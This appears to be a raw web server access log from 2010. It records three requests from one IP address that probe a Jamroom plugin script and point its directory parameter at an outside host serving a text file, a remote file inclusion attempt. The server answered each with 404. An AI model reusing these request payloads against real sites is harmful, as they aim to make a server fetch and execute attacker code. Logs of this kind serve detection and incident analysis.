61.250.93.56 - - [05/Mar/2010:09:40:50 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:50 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [05/Mar/2010:09:40:50 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://deddie.com/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
